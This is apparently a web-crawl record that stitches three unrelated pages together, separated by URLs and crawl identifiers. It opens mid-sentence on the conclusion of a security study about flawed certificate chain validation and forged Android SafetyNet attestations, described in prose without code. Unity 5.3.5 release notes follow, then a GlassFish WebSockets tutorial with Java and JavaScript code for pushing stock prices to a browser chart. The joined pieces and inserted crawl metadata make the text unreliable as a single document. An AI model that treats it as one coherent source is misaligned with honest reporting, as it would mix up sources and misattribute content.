steps outlined in this research to test incorrect certificate chain validation implementations at scale by modifying JWS (or other payloads containing untrusted intermediate certificates) en masse. Finally, scanning public source code repositories for faulty certificate chain validation logic could surface interesting results. 12. Conclusion It's no secret that it's easy to get things wrong when leveraging cryptography in software, but there are concrete steps that can be taken by developers, vendors, cryptographic library authors, and security practitioners to prevent mistakes from happening. In this research, we've demonstrated how things like certificate chain validation can go awry, and what that means in practice when developers are tasked with using or writing cryptographic code with insufficient information or expertise. Forging Android SafetyNet attestations by taking advantage of incorrect certificate chain validation implementations is just one example of how things can go wrong when incorrect assumptions are made in cryptographic systems. Like many things in security, humans are core to the experience. By working together as a community and not assigning blame when things go wrong, we can work toward a more secure future.
https://duo.com/labs/research/chain-of-fools
CC-MAIN-2021-04
en
refinedweb
Unity 5.3.5 The Unity 5.3.5 public release brings you a few improvements and a large number of fixes. Read the release notes below for details. For more information about the previous main release, see its release notes. Improvements - IL2CPP: Stripping of symbols and debug info is now enabled by default. Development builds still have symbols, which makes for a slightly larger binary. - Asset Bundles: Added offset argument to AssetBundle.CreateFromFile and AssetBundle.LoadFromFile methods. - Asset Bundles: Output the CRC value for the manifest asset bundle. - Asset Management: Introduced AssetDatabase.GetAssetDependencyHash method which returns the hash of all the dependencies of an asset. - Cluster Rendering: Improved cluster networking layer and reduced instability while using cluster input. - Graphics: Dynamic batching was reintroduced for particles, lines and trails. (766802) - IL2CPP: Reduce the binary size and build time for projects which make use of many C# attributes. - iOS: Added a compile flag in the trampoline code to allow disabling the filtering of emoji characters. - iOS: Added device support for iPhone SE and iPad Pro 9.7". - OpenGL: ComputeBuffer now uses the same data layout as Direct3D. - Networking: Added support for IPv6 networks in UdpClient. (767741) - VR: Updated Oculus API and plugin to version 1.3.2. Downloading 1.3.2 OVRPlugin from Oculus is no longer necessary. - Windows Store: On the IL2CPP scripting backend, Unity players are now shipped as DLLs rather than static libraries. This significantly reduces platform support module installation size as well as decreases generated C++ code linking time. Changes - Android: IL2CPP - Full debug version of IL2CPP libraries are stored in Temp/StagingArea/Il2Cpp/Native. - OpenGL: ComputeBuffer data layout changes to match Direct3D; see Improvements section for details. - Installer: Updated EULA. Fixes - Analytics: Fixed a rare crash. Only occurs when analytics is on and importing a complete project from the Asset Store with analytics off. - Android: Audio - Fixed OpenSL output not selected when default buffer size selected. (784899) - Android: Buildpipe - Don't make use of preview SDK tools installed. (788040) - Android: Buildpipe - Fixed AAPT errors on project export. (786918) - Android: Buildpipe - Fixed AAR plugin and resource issues on exported projects. (765396) - Android: Disabled Debug markers on PowerVR Series5 devices due to driver issues. (780958) - Android: Fix for EGL_BAD_NATIVE_WINDOW error on resume. (747898) - Android: Fix for GPU skinning on Adreno GPUs. (763755) - Android: Fix for syncing to low framerate with VSync off. (777167) - Android: Fixed a crash in the Development build for some Android devices with PowerVR GPUs (e.g. Asus Memo Pad). (787491) - Android: Fixed blending with background on Unity splash screen. - Android: Fixed crash on Nvidia Shield tablet. (765744) - Android: Fixed crash when loading scenes intermittently. (751530) - Android: Fixed immersive mode switching off on some KitKat devices when pressing volume buttons. (779338) - Android: Fixed incorrect width/height when changing orientation after changing anti-aliasing settings. (771542) - Android: Fixed potential crash when using WWW without having Internet permission (also affects use of Unity Analytics). (779877) - Android: Fixed potential race condition in atomic operations on ARM processors. - Android: Fixed Standard Shader lighting issue caused by half-precision overflow on Mali GPUs. (761744) - Android: Fixed value of trackingEnabled.
- Android: Workarounds for OpenGL ES 3 shader compiler problems on Adreno GPUs. (777617) - Animation Window: Fixed Null Reference Exception in Curve Editor. (775565) - Animation Window: Disabled animation sampling of an optimized game object hierarchy in the animation window. (753270) - Animation Window: Fixed custom components not appearing in the Add Property menu of the Animation Window. (760809, 759069) - Animation Window: Fixed selection loss in animation window when pasting keyframes. (715416) - Animation: Fixed a crash related to exposed skeleton. (784942) - Animation: Fixed a crash when importing an animation where a whole curve was corrupted. (774052) - Animation: Fixed a performance issue for AnimatorOverrideController rebind. (779058) - Animation: Fixed an issue where instantiating a prefab with an Animator Component for the first time took longer than the subsequent times. (771609) - Animation: Fixed an issue where rotation curves would be created as Euler curves by default when using the Animation Component. (772668) - Animation: Fixed an issue where the scale was not working in editor on a GameObject with OptimizeGameObject. (774484) - Animation: Fixed animation event inheriting from ScriptableObject not getting triggered. (762952) - Animation: Fixed crash when an animation key tried to activate a game object which had an animator attached to it. (786873) - Animation: Fixed crash when calling Animator.Update(0) in an AnimationEvent. (783821) - Animation: Fixed crash when a GameObject with an Animator is instantiated in StateMachineEnter/Exit. (770045) - Animation: Fixed crash when shutting down standalone app with Script Playables. (775677) - Animation: Fixed error message in console while optimizing animation hierarchy from the inspector. (775773) - Animation: Fixed issue where Animation was distorted when animated object was scaled and Optimize Game Objects was selected. (766898, 758322) - Animation: Fixed scale value getting zeroed when removing scale curve components in AnimationWindow. (689644) - APIUpdater: Fixed AssemblyUpdater crash when verifying WSA / Windows Phone assemblies. (767506) - APIUpdater: Fixed ScriptUpdater crash when processing Boo / UnityScript containing Hash literals. (769880) - Asset Bundles: Fixed issue where space on device would not be taken into account, which could cause a hang. (762829) - Asset Bundles: Fixed the error messages when building variant asset bundles. (769858) - Asset Bundles: Fixed an issue where unloading an asset bundle with animated objects (legacy animation) during play mode crashed the editor. (775822) - Asset Bundles: Added back scene asset bundles compression statistics. (768965) - Asset Bundles: Fixed a crash while loading asset bundle asynchronously. (747800) - Asset Bundles: Fixed a potential crash when decompressing corrupted LZMA bundles. (782773) - Asset Bundles: Fixed Compress Assets On Import setting being ignored when switching platform. (762739) - Asset Bundles: Fixed CreateFromMemory not working with "." in filenames. (734216) - Asset Import: Fixed a crash on FBX import in some rare circumstances. (768846) - Asset Import: Fixed issue where changing date modified on a directory meta file caused all files below that directory to be reprocessed. This was also affecting VCS. (756559) - Audio: Don't try to load any sounds when Unity audio is disabled. (776044, 763036) - Audio: Fixed an issue where Low Pass Filter didn't work on Audio Listener.
(732854) - Batch mode: Fixed an issue where BuildPlayer calls might cause compilation errors to be logged in subsequent runs. (703290, 786195) - Cache Server: Upgraded the node.js version to 0.12.7. (760234) - Compute: Do not log warnings/errors when current build target does not support compute shaders. - Core: Added stacktrace for logging statements and exceptions called on threads. (697872, 633905) - Core: ArgumentCache.TidyAssemblyTypeName is now alloc-free if the type name is already clean. (738249) - Core: Fixed crash when scaling prefab with mesh that is not read/write enabled. (766019) - Core: When exporting a package with a scene's dependencies, checkboxes are available next to the folder icon. (752733) - Core: is now a case-insensitive Dictionary, as per the RFC2616 spec. (770155) - D3D11: Fixed a deadlock which would occur when trying to restore focus to a minimized standalone player running in Fullscreen Exclusive mode. (523691) - D3D11: Fixed exclusive mode window reactivation issues after focus has been lost. (788555) - D3D11: Fixed some rare crashes on memory constrained systems (log would contain resource creation failure messages). - D3D9: Player loop will now be processed in the background again when the graphics device is lost (Windows are locked, window is minimized, etc.). (752626) - Editor: Fix for core assemblies not being reloaded after encountering errors in user scripts. (750423) - Editor: Added support for resizing the height of the preferences window. (763313) - Editor: Adjusted the width of the 'Build Settings' window so that it properly displays its contents, even if support for some of the players is not currently available. (728634) - Editor: Files with invalid names can no longer be dragged into a project. (663994) - Editor: Fixed a crash that could happen when the animation window is open and playmode is entered. (696623) - Editor: Fixed a crash when locking cursor from constructor or static initializer. (765466) - Editor: Fixed a crash when padding ASTC texture when building from command line. (759288) - Editor: Fixed an inconsistency between visible and hidden meta file modes, where empty folders were recreated in 'visible' mode. (588531) - Editor: Fixed an issue that could cause scenes containing prefab instances with driven transforms to immediately become dirty. (709639) - Editor: Fixed an issue that was causing transformations to be modified when entering and subsequently coming back from play mode. (759115) - Editor: Fixed an issue where compression wasn't being applied in calls to BuildPipeline.BuildStreamedSceneAssetBundle(). (781866) - Editor: Fixed an issue where unloaded scenes were removed from hierarchy after exiting playmode. (769613) - Editor: Fixed an issue with dragging a Sprite/Texture2D into the inspector causing a PolygonCollider2D to use it even though it is not dropped on the component editor itself. (778125, 780607) - Editor: Fixed changing order of components not getting saved. It now also supports undo. (764986) - Editor: Fixed crash on launch if "metadata" folder is deleted before launching. (746964) - Editor: Fixed newly installed Unity command line activation issue. (790345) - Editor: Fixed performance issue in Sprite Inspector. (709059) - Editor: Fixed Target Support module download URLs in Build Settings. - Editor: Fixed the asset importer error when calling Refresh() during an assembly import. (730559) - Editor: Fixed WebViewWindow's freed memory access. (775366) - Editor: Fixed wrong error message when returning license via command line.
(784727) - Editor: Fixed an issue where the Services window would be missing after logging off. (781863) - Editor: If a read-only file or folder is duplicated, the read-only status is no longer duplicated. (730245) - Editor: Improved error messages for unsupported target platform in batch mode. (782752) - Editor: Now show alert popover for invalid serial format. (775898) - Editor: Removed SelectionBase from LOD Group. (763231) - Editor: Sped up importing of some Fonts by updating the progress bar less often than "crazy often". - Editor: Fixed access to destroyed window during shutdown. (775244) - Editor: Fixed access violation in some editor GUIView operations. (769833) - GI: Fixed incorrect normal mapping on Directional Specular lightmaps; shader code was not matching up with what Enlighten was baking. (755421, 766533, 766546, 779696, 756020, 780025) - GI: Clamped DynamicGI.indirectScale to the allowed range. (664953) - GI: Disabled LightProbeGroup components no longer display visualization in the scene view. (662572) - GI: Fixed errors when using baked lightmaps & multi-scene editing. (753822) - GI: Fixed realtime GI texture coordinates sometimes going wrong on static-batched meshes. (743273) - GI: Fixed some cases of scenes not referencing the correct lighting data asset after a bake. (757575) - GI: Improved wording of various Enlighten error messages. - GI: Now properly initialize baked scenes in some code paths to avoid an error on the console. (753822) - GI: Upgraded to Enlighten 3.02p4. Fixes direct lighting getting baked into the lightmap (697565). Fixes a precision issue and out-of-bounds texture access in baking, which could lead to a crash in the Final Gather stage. (767110) - GI: Fixed realtime probe turning black when changing Reflection Probe component positioning in the inspector. (653592) - GI: Fixed a Reflection Probe baking issue when multiple scenes are used in a project. - GI: Fix for objects added before saving the scene not being included in the bake result. (728610) - GI: Fixed a crash when building reflection probe data on specific scenes containing Canvas elements. (767560, 763045) - Graphics: Fixed a glitch in Crunch format compressed non-alpha texture after using sprite packer. (774638, 768171) - Graphics: Fixed internal profiler for static batching on Android, iPhone and Windows Store. (769539) - Graphics: Fixed material index not being used when calling Graphics.DrawMeshNow with rotation. (765378) - Graphics: Fixed MovieTexture crash when loading a video with no audio stream. - Graphics: Fixed potential crash in SetGpuProgramName. - Graphics: Fixed static batching errors when meshes have additional vertex data streams with mismatching vertex count. (775261) - Graphics: Fixed TrailRenderer showing a gap between the current position and the last update. (779129) - Graphics: Upgrading a shader with a DX11 [annotation] at the start of the file now doesn't crash. (766992) - IL2CPP: Corrected an intermittent crash when Environment.GetCommandLineArguments is called. (775804) - IL2CPP: Emit proper C++ code for COM marshaling of methods that have at least one parameter that cannot be marshaled. (789905) - IL2CPP: Fixed a rare deadlock during Resources.UnloadUnusedAssets. (756912) - IL2CPP: Fixed an intermittent crash in the experimental memory profiler. (776152) - IL2CPP: Fixed an issue with Socket.Select and IL2CPP where a socket could be reported as being in an error state when it should have been reported as being in a write state.
(759488) - IL2CPP: Generate C++ code to properly handle circular references for field types in unsafe C# code. (780472) - IL2CPP: Generate proper C++ code for a C# class with the StructLayout attribute when its base class does not have a StructLayout attribute. (767367) - IL2CPP: Generate proper C++ code for a method that is marked as both an internal call and a runtime call. (781439) - IL2CPP: Generate proper C++ code for the OnSerialize method injected by UNET in classes deriving from NetworkProximityChecker. (786499) - IL2CPP: Generate proper C++ code for the p/invoke wrapper for a delegate that accepts another delegate as an output parameter. (778146) - IL2CPP: Generate proper C++ code for assemblies compiled with Visual Studio when a method returning an IntPtr returns an integer value. (787687) - IL2CPP: Improved message for PathTooLongException being encountered in IL2CPP. (717343) - IL2CPP: Increased maximum heap size. - IL2CPP: Now correctly return the remote end point from a UDP socket receive call in an IPv6 network. (767741) - IL2CPP: Now generate proper code for COM marshaling of a struct that contains a field of type object array. (781921) - IL2CPP: Prevent a compile error in the generated C++ code due to a missing header when a generic exception type is used in a catch statement. (776087) - IL2CPP: Properly handle numeric conversion from an unsigned integer to floating point types in some edge cases. (780659) - IL2CPP: Properly handle type casts and checks for value type arrays when they are cast to generic collection interfaces. (782653) - IL2CPP: Support proper default marshaling of string parameters and return values when the CharSet attribute is provided on a method with a value of Unicode. (692653) - IL2CPP: Throw an informative exception when a MonoPInvokeCallback delegate type is incompatible with the target method signature. (732438) - Input: Input.mousePosition is no longer clamped to the client area on Windows standalone; the last position is kept instead. (769666) - iOS: Added Xcode 7.3 Build & Run support. - iOS: Allow IPv6 to work on iOS with the .NET 2.0 profile. (730146) - iOS: Allow third party plugins that use the PLCrashReporter library. (768572) - iOS: Apple Pencil pressure will now be exposed the same way 3D Touch pressure already is. - iOS: Do not export non-prefixed freetype2 symbols now. (778668) - iOS: Ensure asset bundles are not flagged for iCloud backup by default upon download. (771597) - iOS: Ensure that our symbols are not overridden by user libraries. (774685) - iOS: Fixed a crash when playing a scene in the Editor with an iOS device attached as a Unity Remote. (771132) - iOS: Fixed GLES error 0x0506 and various graphics corruption when using WebCam textures. (763342) - iOS: Fixed incompatible pointer cast warning in trampoline. (776105) - iOS: Fixed memory leak when using On Demand Resources. (776528) - iOS: Fixed support for non-native resolutions in GLES 2. (779738) - iOS: Fixed the incorrect ABI for int64 types on iOS. (774544) - iOS: Fixed UnityWebRequest hanging on responses > 64k when using a custom DownloadHandlerScript. (780329) - iOS: Made Social.ShowLeaderboardUI show the leaderboards tab instead of the achievements tab. (777596) - iOS: Pause application on GameCenter dialogs on tvOS. (767633) - iOS: Switching between different input fields will not leave input accessory fields on screen. (775710) - iOS: TouchInputModule and StandaloneInputModule will now handle all touch phases, preventing unwanted module switches.
(764054) - iOS/IL2CPP: Prevent unnecessary changes to the timestamps of the libil2cpp headers during a build. This allows incremental builds to work correctly in Xcode. - iOS/tvOS: AdSupport is now removed from Default Frameworks and needs to be explicitly selected under Framework Dependencies in Platform Settings if required. (732878) - iOS/tvOS: Fixed a regression which caused artefacts when using the GLES2 Graphics API. (785036) - JsonUtility: Fixed EditorJsonUtility throwing MissingMethodException. (769085) - Linux: Don't query displays when running in nographics mode. - Linux: Exit with a nice message instead of crashing when the GPU/driver doesn't meet minimum requirements. (777564, 783842) - Linux: Fixed a crash when stereoscopic mode is requested on a non-stereoscopic display. (784075) - Linux: Fixed an occasional crash when creating texture properties. - Mac Editor: Added functionality to prevent the processing of folders that contain the ".unity" extension, as this was causing the editor to crash when executing in batch mode. (761639) - MacDownloadAssistant: Fixed window focus issue after security prompt. - Mac Editor: Fixed UI text rendering on Radeon HD 4000 series and older AMD GPUs. (783713) - Mac Editor: Application.version now returns the application's version. It no longer returns Application.unityVersion. (764054) - MemoryProfiler: Added toggle to exclude references in detailed memory dump to reduce the memory footprint used. (783527) - Mono: Fixed GC related test instability in OSX Editor. (777945) - Mono: Make the Personal folder be the same on all profiles. (776268) - Networking: Fixed issue with the SyncList change callback where the old value was given instead of the updated one. (774970) - Networking: Fixed problem where transferring data via a reliable sequenced QoS channel could lose messages in "bad" network conditions. (781177) - Networking: Fixed problem where HostTopology.MessagePoolSizeGrowthFactor was ignored. (773411) - Networking: Fixed WebGL client unable to free connections in NetworkServer when using WebSocket. (768030) - OpenGL: Fixed a bunch of compute shader structured buffer access corner case issues. (767348) - OpenGL: Fixed invalid shader code generation when using gl_PrimitiveID or bitFieldInsert(). - OpenGL: Fixed mislocated fragment shader default float precision. Now also basing the default precision on actual GPU capabilities. (763638) - OpenGL: Fixed multiple simultaneous append/consume compute buffers usage. - OpenGL: Fixed rendering when Graphics.Blit is being called after WaitForEndOfFrame. (784880) - OpenGL: Shader compiler: added unused global uniform pruning. - OpenGL: Shader compiler: avoid temporary variable name collisions. (780831) - OpenGL: Shader compiler: fixed shader translation bugs. (782514) - OpenGL/ES: Fixed GPU profiler on Android for Tegra 2/3/4 devices. (776539) - Particles: Do not restart simulation when becoming visible, and use bigger timesteps, to reduce performance spikes. (765905) - Particles: Fixed a case where OnWillRenderObject rendering would break the main scene. (773226) - Particles: Fixed a crash caused when using the Inherit Velocity Module. (783433) - Particles: Fixed a crash when material is missing and mesh colors are requested. (774931) - Particles: Fixed a crash when using SubEmitters with separate rotation axes. (757377) - Particles: Fixed an issue where Material Property Blocks were not working with mesh particles. (776143) - Particles: Fixed batching issues when using multiple cameras in the same position.
(788023) - Particles: Fixed culling when using SetParticles. (496494) - Physics: Fixed cloth deleting the MeshRenderer component when entering playmode. (769137) - Physics: Fixed disabling the cloth component not actually disabling it. (669622) - Physics: Ensure that OnTriggerExit2D is not called when changing the Rigidbody2D.isKinematic property. - Physics: Fix for Collision2D.relativeVelocity being reported with incorrect values. (758422) - Physics: Fixed an issue with 2D colliders where line & ray casting did not detect the initial overlapped state. - Physics: Fixed an issue with Box2D changes slowing the editor down when lots of changes are made without entering play mode. (777591) - Physics: Fixed cloth issue where adding cloth to an object threw a GetLocalizedString error. (769136) - Physics: Provide feedback to allow working around crashes occurring when input meshes contain invalid vertices. (766891) - Physics2D: Fix to ensure that changing a Collider2D property via the inspector doesn't reset the OnCollision or OnTrigger state back to 'Enter'. (786032) - Physics2D: Fixed a problem where both AreaEffector2D and PointEffector2D scaled-up forces for each additional collider on a rigidbody. (780257) - Physics2D: Fixed a problem where constantly changing an Effector2D collider would mean that no contacts were ever processed, stopping the effector from working. - Prefabs: Implemented OnWillSaveAssets callback when applying prefabs. (754351) - Profiler: Fixed a crash when adding data from a thread which was started during a frame. (758264) - Resources: Enable warnings for, and prevent crashes and memory corruption when, non-assets or non-unloadable assets are unloaded through Resources.UnloadAsset in release builds. (767120) - Samsung TV: Enabled a "Show Unity Splash Screen" check box in Samsung TV's PlayerSettings. - Samsung TV: Fixed multiple crashes on the NT14U TV that would prevent games from launching. - SpeedTree: Fixed "GetLocalizedString is not allowed to be called" error message when using the Tree Editor. (779965) - Terrain: Fixed crash when exiting Editor after creating TerrainData with the HideAndDontSave flag. (780365) - Tizen: Fixed issue deploying after upgrading to the Tizen 2.4rev4 SDK. (743653) - tvOS: Enabled game controller in tvOS on-screen keyboard. (776446) - tvOS: Fixed a bug that caused splash screen properties to not be applied. (775008) - tvOS: Fixed a crash when calling OnDemandResourcesRequest.Dispose() in a coroutine. - tvOS: Fixed build targeting tvOS 9.2 with Xcode 7.3 beta. (770115) - tvOS: Separated tvOS SDK and OS version settings from iOS. (749311) - UI: Fix for child UI elements not being rendered when scaling a World Space Canvas from zero. (768807) - UI: Fixed ArgumentOutOfRange exception sometimes being thrown when editing an InputField on mobile. (762080) - UI: Fixed dropdown destroy coroutine being started when the component is not active. (758873) - UI: Fixed crash due to a dirty renderer being in the dirty list after being destroyed. (764711) - UI: Fixed double rendering of canvas on Vive VR. - UI: Fixed object culling when unparenting from a mask type. (740604) - UI: Fixed Selectable not handling the case when the EventSystem is null. (788037) - UI: Fixed setting Input Field text when in Decimal/Integer mode with invalid values. - UI: Setting Input Field text through script will now be validated. - UnityWebRequest: Downgrade to HTTP GET on 302 and 303 redirect codes. (751798) - UnityWebRequest: Honor negative redirectLimit.
(751794) - UWP: Build & Run will correctly work with Universal Windows 10 Apps. (771326) - UWP: Screen.currentResolution will return the desktop resolution when the application is in windowed mode. (771541) - VisualStudio: Fixed a crash that could sometimes happen when opening Visual Studio. - VR: Fixed an issue with incorrect Render Texture size being used. Most notable with deferred rendering. - VR: VRFocus now respects RunInBackground. A Run In Background value of true will now disable rendering if VRFocus is lost. - WebGL: Fixed SimpleWebServer bug causing 'Uncaught incorrect header check'. (770266) - Wii U: Added crash fixes, memory efficiency and 16-bit texture support. - Wii U: Fixed issues causing known crashes. - Windows: SystemInfo.deviceModel will now report model name and manufacturer. (784466) - Windows Standalone: P/Invoke will work correctly with native libraries which reference other native libraries, if those libraries are located in the same directory. (776918) - Windows Store: Assembly-CSharp-firstpass will no longer reference itself. (775216) - Windows Store: Correctly generate the Visual Studio namespace when the product name contains the ' symbol; an underscore will be used instead. (754102) - Windows Store: Disable the Generate C# option when the scripting backend is set to IL2CPP. (775344) - Windows Store: Files located in Assets\Resources won't end up in the generated Assembly-CSharp-firstpass project, but will be correctly placed in the Assembly-CSharp project. - Windows Store: Fixed $(OutDir) and $(IntDir) paths for generated IL2CPP Visual Studio solutions which prevented appx bundles from building correctly. - Windows Store: Fixed a rare crash at startup related to serialization in debug mode. (778905) - Windows Store: Fixed an assert happening during mesh compression. - Windows Store: Fixed an exception while marshalling UnityEngine.NavMeshTriangulation. - Windows Store: Fixed an issue with populating visual assets (tiles, logos, etc.) to the Visual Studio solution (correct file names, manifest entries) and checking format consistency (JPEG vs PNG). (775592, 775624, 777575, 777580) - Windows Store: Fixed Build & Run for Universal 8.1 solution. (789538) - Windows Store: Fixed generics related AssemblyConverter failure and gave better error messages. (762780) - Windows Store: Fixed incorrect orientation of extended splash screen on Windows Phone 8.1. (770092) - Windows Store: Fixed marshaling of UnityEngine.HumanDescription; previously the field hasTranslationDoF was not marshaled at all. - Windows Store: Fixed marshaling of UnityEngine.SplatPrototype; previously the fields specularMetallic and smoothness were not marshaled, because of which terrain would sometimes be rendered incorrectly. (786889) - Windows Store: Fixed Screen.orientation returning AutoRotation on startup. (787522) - Windows Store: Fixed stacktraces on the IL2CPP scripting backend. (781907) - Windows Store: Fixed Tab key duplication in XAML controls when Unity input is enabled. (775931) - Windows Store: Fixed return result; previously it would return only an error code, now it will also contain the error message returned by the server. - Windows Store: Having many generic types in the project no longer makes the .NET Native compiler run out of memory. - Windows Store: Help SerializationWeaver find references which have a Windows SDK specified when building for Universal 8.1. (781994) - Windows Store: Hindi characters will show up correctly; Nirmala UI from Windows fonts will be used.
(779136) - Windows Store: Package.appxmanifest for Universal Windows 10 Apps will be produced correctly when a protocol for association launching is specified. (780971) - Windows Store: RuntimeInitializeOnLoadMethod will work correctly. (777878) - Windows Store: Screen.SetResolution will correctly work on Windows Phone 10. (773877) - Windows Store: Slightly fixed the generated Assembly-CSharp* projects to resolve "System.BadImageFormatException: Duplicate type with name 'UnityEngine.Internal.$FieldNamesStorage' .. ". (781935) - Windows Store: EventType.ScrollWheel is now properly detected. (784975) - Windows Store: The maximum number of characters for the short name for tiles is now 40. (789439) - Windows Store/IL2CPP: Allow the MapFileParser utility to handle input and output files with paths containing non-ASCII characters. (779968) - Windows Store/IL2CPP: Fixed a crash on Windows when using asynchronous socket APIs (.BeginSend/.BeginReceive/etc). (771883) - Windows: Fixed standalone Windows player position when bigger than the primary monitor. (760215) - WindowsDownloadAssistant: Fixed setting VisualStudio 2015 as the Unity script editor. - WindowsDownloadAssistant: Fixed the bug which was freezing the installation UI during bad network connections. (732955) Changeset: 960ebf59018a
https://unity3d.com/ru/unity/whats-new/unity-5.3.5
CC-MAIN-2021-04
en
refinedweb
Learn how to push browser updates using WebSockets in GlassFish, in this tutorial from February's JAX Magazine. WebSockets are new in HTML5 and provide the capability to establish a full-duplex connection between the web server and the web browser. This means for the first time we can write applications to push updates to the browser directly from the server without having to use complex hacks like long polling, Comet or third party plugins like Flash. In this tutorial I'll demonstrate pushing stock "updates" to a browser over WebSockets to asynchronously update a stock price graph, purely using the push capabilities inherent in WebSockets. I'll also use GlassFish in this tutorial as it has out-of-the-box WebSocket support in the latest production release, GlassFish 3.1.2.2, so the code can be built and deployed now. However, WebSocket support is not enabled by default. WebSocket support can be enabled via the administration console, but the simplest way is to use an asadmin command:

asadmin set configs.config.server-config.network-config.protocols.protocol.http-listener-1.http.websockets-support-enabled=true

To keep things short, in this tutorial, our application will just spawn a thread to create random updates to the Stock price. However, in a real application, it would be simple to hook our application to a data feed via JMS or some other mechanism. Sidebar: The Java API for WebSockets is being standardised in the JCP under JSR 356. Currently, application servers use a proprietary API to unlock WebSockets functionality, and the GlassFish API here is specific to GlassFish. Tomcat and other servers have a different API. If you are interested in the proposed JEE7 WebSockets API, head over to the JCP page to take a look. WebSockets are supported in GlassFish thanks to the Grizzly library. The key classes in the Grizzly WebSocket API we need are shown in Figure 1. Figure 1: Key classes in the Grizzly WebSocket API StockSocket class Working from the bottom up, first we must create a derived class of the Grizzly WebSocket class. This class will implement the protocol between the browser and GlassFish. As we'll see later, one instance of this class is created for each client browser. In our class, we will implement Runnable, spawn a Thread and send updates to the browser. In this code (shown in Listing 1), we will take advantage of the Grizzly-provided DefaultWebSocket class. This implements all the methods of the WebSocket interface with no-ops, so we can just override the methods we are interested in. Listing 1

public class StockSocket extends DefaultWebSocket implements Runnable {
    private Thread myThread;
    private boolean connected = false;

    public StockSocket(ProtocolHandler protocolHandler, WebSocketListener... listeners) {
        super(protocolHandler, listeners);
    }

In the onConnect method (which is called when a client browser connects to the server) we need to create a new Thread and pass the WebSocket instance as the Runnable, as shown in Listing 2. Listing 2: onConnect

@Override
public void onConnect() {
    myThread = new Thread(this);
    connected = true;
    myThread.start();
    super.onConnect();
}

In the run method (Listing 3), we will periodically call our custom sendUpdate method using a random value for a Stock. Our Stock class is a simple Serializable POJO DTO with three attributes: name, description and price.
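The tutorial does not show the Stock class itself, so here is a minimal sketch consistent with the prose and with the object.price field used later in the JavaScript; the exact field layout is an assumption:

import java.io.Serializable;

public class Stock implements Serializable {
    private String name;
    private String description;
    private double price;

    public Stock(String name, String description, double price) {
        this.name = name;
        this.description = description;
        this.price = price;
    }

    // Getters are needed so Jackson can serialize the object to JSON.
    public String getName() { return name; }
    public String getDescription() { return description; }
    public double getPrice() { return price; }
}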
Listing 3: Run

public void run() {
    while (connected) {
        Stock stock = new Stock("C2B2", "C2B2", Math.random() * 100.0);
        int sleepTime = (int) (500 * Math.random() + 500);
        try {
            // Thread.sleep is a static method and throws a checked
            // InterruptedException, which run() cannot propagate.
            Thread.sleep(sleepTime);
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
            return;
        }
        sendUpdate(stock);
    }
}

In the sendUpdate method (Listing 4), we serialize the Stock object using the Jackson library into a JSON string. We then send this to the browser over WebSockets by calling the Grizzly base class' send method, which writes the JSON string down to the browser. Listing 4: sendUpdate

public void sendUpdate(Stock stock) {
    // CONVERT to JSON
    ObjectMapper mapper = new ObjectMapper();
    StringWriter writer = new StringWriter();
    try {
        mapper.writeValue(writer, stock);
    } catch (IOException ex) {
        // ignored for brevity
    }
    String jsonStr = writer.toString();
    // SEND down the WebSocket
    send(jsonStr);
}

Finally, in our onClose method (Listing 5), we will notify the thread to stop by setting connected to false. Listing 5: onClose

@Override
public void onClose(DataFrame frame) {
    connected = false;
    super.onClose(frame);
}
}

StockApplication class To hook our derived StockSocket class into the GlassFish server, we need to create a derived WebSocketApplication class, shown below:

public class StockApplication extends WebSocketApplication {

In this class there are two methods we need to override. The first is isApplicationRequest, which is called by GlassFish when a client browser connects to GlassFish over the WebSocket protocol (Listing 6). Our application needs to check the request and decide whether it wants to accept the connection. In this case, we will check whether the context path of the WebSocket request ends with the string "/stocks". If so, we need to tell GlassFish that the request is for us by returning true. Listing 6: isApplicationRequest

@Override
public boolean isApplicationRequest(Request request) {
    if (request.requestURI().toString().endsWith("/stocks")) {
        return true;
    } else {
        return false;
    }
}

The second method is createWebSocket (Listing 7). Here, we need to create and return an instance of our StockSocket class described above. The createWebSocket method is called by GlassFish when a client browser connects to our application and we have accepted the request. Listing 7: createWebSocket

@Override
public WebSocket createWebSocket(ProtocolHandler protocolHandler, WebSocketListener... listeners) {
    return new StockSocket(protocolHandler, listeners);
}

StockServlet Class The final class we need to write is a simple servlet. This servlet only exists to ensure we register our derived StockApplication class with Grizzly's WebSocketEngine. Listing 8: StockServlet

@WebServlet(name = "StockServlet", urlPatterns = { "/stocks" }, loadOnStartup = 1)
public class StockServlet extends HttpServlet {
    private StockApplication pushApp;

We do this in the init method of our servlet, and to ensure our servlet is created on deployment, we must specify in the annotations that an instance should be created on startup, as shown above.

@Override
public void init(ServletConfig config) throws ServletException {
    super.init(config);
    pushApp = new StockApplication();
    WebSocketEngine.getEngine().register(pushApp);
}

We also need to override the destroy method to ensure our StockApplication is unregistered from the WebSocketEngine on undeployment.

@Override
public void destroy() {
    super.destroy();
    WebSocketEngine.getEngine().unregister(pushApp);
}
}

HTML5 & JavaScript Once we have written our Java servlet and the classes to use Grizzly's WebSocket API, we need to turn our mind to the HTML and JavaScript code.
For our demonstration we are going to use a JavaScript library called Highcharts, which is free for non-commercial use. This JavaScript library can render very sexy charts purely by using HTML5. For our browser we will create a simple JSP page which uses the WebSocket JavaScript API to connect to GlassFish over the WebSocket protocol and then receives our JSON stock updates, which it feeds to Highcharts to graph. The first thing you need to do in the WebSockets JavaScript API is to connect to the GlassFish server using the WebSocket protocol. To do this, we need to create a URL of the form ws://<host>:<port>/<context> and pass this to the constructor of the WebSocket class.

<script type="text/javascript">
    var wsUri = "ws://" + location.host + "${pageContext.request.contextPath}/stocks";
    websocket = new WebSocket(wsUri);

Once we have our WebSocket object, we then must set up the callback functions. These JavaScript functions are called by the browser when WebSocket events occur, for example, when the socket is opened (onopen), closed (onclose) or there is an error (onerror). For simplicity, we will set these as empty functions.

websocket.onopen = function(event) { };
websocket.onclose = function(event) { };
websocket.onerror = function(event) { };

The most important callback is onmessage. This is triggered when the browser receives data from the server over the WebSocket, and in our case will be called when we receive the JSON string representing the stock object. So we will parse the JSON string and create a new datapoint in Highcharts for this stock price update.

websocket.onmessage = function(event) {
    var object = JSON.parse(event.data);
    var x = (new Date()).getTime();
    var y = object.price;
    document.chart.series[0].addPoint([x, y], true, true, false);
}
</script>

The initialisation of the Highcharts chart is done in the head of the document, a snippet of which is shown below. Listing 9: Highcharts

<script type="text/javascript">
    $(document).ready(function() {
        Highcharts.setOptions({
            global: { useUTC: false }
        });
        var chart;
        document.chart = new Highcharts.Chart({
            …
        });
</script>

